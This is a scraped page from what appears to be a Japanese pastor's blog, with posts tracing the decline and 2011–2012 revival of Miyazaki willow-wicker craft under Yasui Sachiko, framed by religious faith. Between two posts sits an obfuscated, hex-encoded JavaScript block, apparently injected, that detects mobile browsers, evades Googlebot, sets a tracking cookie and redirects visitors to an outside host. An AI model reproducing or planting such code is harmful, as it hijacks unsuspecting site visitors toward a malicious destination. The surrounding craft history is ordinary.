Posted on 12/02/2015 at 15:25, by nonaka

前途多難のスタート

安井さんの脳梗塞のため言葉もなかなか聞き取れず、体も右半分が麻痺していた。復興に必要な型づくりの話をいくら聞いても全く理解できなかった。また、もう8年もブランクがあり、体も自由が利かなかったため、毎週足に手を置いて「イエスのみ名で癒されよ。」と祈り始めた。結果体が少しずつ癒されていった。

  • 材料がない。材料がなければ作業はできないので、材料の確認から始まった。「炊きものにして燃やした」と言っていたが、大量の柳がブルーシートの中に眠っていた。
  • 型枠がない。何を作れば良いのかわからない。そのため、久能さん(もやい工芸)に電話をし、何を作れば良いか?どのようなトラブルが予想できるのか?アドバイスをもらたった。
  • 道具がない。「とじ」と呼ばれる道具や、竹で作られた留め具などが見つかる。
  • 窯の修理が必用。窯を掃除し、サビを落とし、ボイラーを付け、窯が使えるようになった。
  • お金がない。大分県佐伯市に住むクリスチャン・相良サカエさん娘の相良響子さんが、生命保険を解約しそのお金を捧げてくれた。もう無理というようなことは毎日起こった。もうやめようか?と途方に暮れることも何度もあった。しかし、イエス様のみ心なら必ず道は開かれる。という信仰のみで歩んでゆく。
  • 2012年10月2日:初窯決意から1年経過
Posted on 12/02/2015 at 15:18, by nonaka

イムジンガク・イムジン河の畔で復興を決意

イムジンガク・イムジン河の畔で復興を決意 Posted on 11/30/2015 at 17:37, by nonaka

宮崎の杞柳細工の歴史ー8

安井早智子さんが救われる

  • 2009年12月6日バプテスマを受ける
  • 聖書の学びで「日本民芸運動に携わる久野恵一さん(もやい工芸)の話を聞く」牧師の野中は、読谷山焼北窯米司工房に弟子入りしていたとき、久野さんと面識があり、神様の導きの深さを痛感する。
  • 2011年11月28日・イムジン河の畔で神様からの呼びかけを受ける。復興を決意
  • 8年の時間を経て取り組みが再開する。
Posted on 11/30/2015 at 17:29, by nonaka

宮崎の杞柳細工歴史ー8

宮崎の杞柳細工歴史ー8

杞柳細工が途絶える

  • 農業を営んでいた夫が材料を育て、早智子さんらが編んでいく。

早智子さんが脳血栓(2003)で倒れ、夫がガンでなくなり(2008)、技術を継承する後継者が育たぬまま途絶える。

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Posted on 11/30/2015 at 17:26, by nonaka

宮崎の杞柳細工の歴史ー7

宮崎の杞柳細工の歴史ー7

安井家での継続

  • 最後に安井早智子さんが4~5人で細々と継続してゆく。自宅の一部を工房に改装し、裏に小屋を建てる。また田んぼ2反に5,000本から10,000本の4種類のコリヤナギが植えられる。年に2回の収穫
お問い合わせ アーカイブ ログイン